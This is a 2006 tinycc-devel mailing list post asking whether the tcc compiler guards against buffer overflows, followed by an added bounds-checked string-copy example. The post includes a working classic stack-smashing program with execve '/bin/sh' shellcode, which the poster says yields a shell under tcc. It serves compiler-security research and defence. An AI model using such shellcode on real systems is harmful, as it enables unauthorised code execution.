tinycc-devel

[Tinycc-devel] Buffer overflow protection ?


From: Xushi
Subject: [Tinycc-devel] Buffer overflow protection ?
Date: Mon, 11 Dec 2006 19:34:23 +0000
User-agent: KMail/1.9.5

Hi All.

I'm new to tcc, and I like it so far, nice and small.

Does tcc have any protection against buffer overflows? I've done some basic 
testing and got weird results.

Two programs, the first one is a simple overflow. It segfaults in tcc 0.9.23 
(doesn't in gcc 4.1).
===========================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void overflow(void) {
   char buff[5];
   strcpy(buff, "0123456");
}

int main(void) {
   printf("overflow\n");
   overflow();
   return EXIT_SUCCESS;
}
============================


The second one has a shell (in hex to pass it overflowing the RET address), 
copying   , to my interest, segfaults in gcc 4.1, but it works in tcc, giving 
me access to a shell.

=============================
#include <string.h>

char shellCode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char largeString[128];

void main() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) largeString;

  for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;

  for (i = 0; i < strlen(shellCode); i++)
    largeString[i] = shellCode[i];

  strcpy(buffer, largeString);
}
=============================

Don't get me wrong, I'm not complaining at all, I'm using tcc for my thesis 
because of the ability to do this (very exciting too). I just wonder, does 
tcc have protection?

Thanks,
Sam.



-- 

Xushi
><ushi.co.uk
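
Added example, not part of the original post and not tcc code: a bounds-checked replacement for the two `strcpy` calls above, using the same buffer sizes (5 bytes, and 96 bytes against a 128-byte source). The helper name `checked_copy` and the filler bytes are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper, not from the post or from tcc: copy the string in
 * src (at most src_size bytes) into dst only if it fits with its NUL.
 * Returns 0 on success, -1 on refusal; on refusal dst is an empty string. */
int checked_copy(char *dst, size_t dst_size, const char *src, size_t src_size)
{
    const char *nul;
    size_t len;

    if (dst == NULL || dst_size == 0 || src == NULL)
        return -1;
    dst[0] = '\0';
    /* Search for the terminator inside the source bound only, so an
     * unterminated source is rejected rather than read past its end. */
    nul = memchr(src, '\0', src_size);
    if (nul == NULL)
        return -1;
    len = (size_t)(nul - src);
    if (len + 1 > dst_size)      /* string plus NUL must fit */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* First program's sizes: "0123456" needs 8 bytes, buff holds 5. */
int first_case(void)
{
    char buff[5];
    return checked_copy(buff, sizeof buff, "0123456", sizeof "0123456");
}

/* Second program's sizes: a completely filled 128-byte source (constructed
 * filler bytes, no terminator) against a 96-byte destination. */
int second_case(void)
{
    char large_string[128], buffer[96];
    memset(large_string, 'A', sizeof large_string);
    return checked_copy(buffer, sizeof buffer, large_string, sizeof large_string);
}

int main(void)
{
    char ok[5];
    int fit = checked_copy(ok, sizeof ok, "0123", sizeof "0123");
    printf("first=%d second=%d fit=%d (%s)\n", first_case(), second_case(), fit, ok);
    return 0;
}
```

Both cases from the post are refused with -1 instead of writing past the destination, regardless of which compiler builds the program.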



